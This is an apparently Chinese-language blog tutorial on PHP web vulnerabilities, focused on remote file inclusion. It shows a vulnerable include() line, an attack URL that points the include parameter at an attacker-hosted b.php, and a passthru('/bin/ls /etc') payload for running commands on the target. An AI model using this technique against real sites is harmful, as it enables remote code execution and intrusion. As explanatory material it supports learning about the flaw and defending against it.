本文探讨了PHP页面的常见安全漏洞,包括包含文件漏洞、脚本命令执行漏洞等,并通过实例详细解析了如何利用包含文件漏洞进行攻击。
从现在的网络安全来看,大家最关注和接触最多的web页面漏洞应该是asp了,在这方面,小竹是专家,我没发言权。然而在php方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多。在这里,就跟大家来稍微的讨论一下php页面的相关漏洞吧。
我对目前常见的php漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,sql注入漏洞等几种。当然,至于cookie欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多。那么,我们就一个一个来分析一下怎样利用这些漏洞吧!
首先,我们来讨论包含文件漏洞。这个漏洞应该说是php独有的吧。这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以web进程权限在系统上执行任意命令。我们来看一个例子:假设在a.php中有这样一句代码:
以下是引用片段:
include($include."/xxx.php");
?>在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的。比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了。我们可以在b.php中写入类似于:passthru("/bin/ls /etc");的代码。这样,就可以执行一些有目的的攻击了。(注:web服务器应该不能执行php代码,不然就出问题了。相关详情可以去看<<如何对php程序中的常见漏洞进行攻击>>)。在这个漏洞方面,出状况的很多,比方说:paypal store front,hotnews,mambo open source,phpdig,yabb se,phpbb,invisionboard,solmetra spaw editor,les visiteurs,phpgedview,x-cart等等一些。
扫一扫
13万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
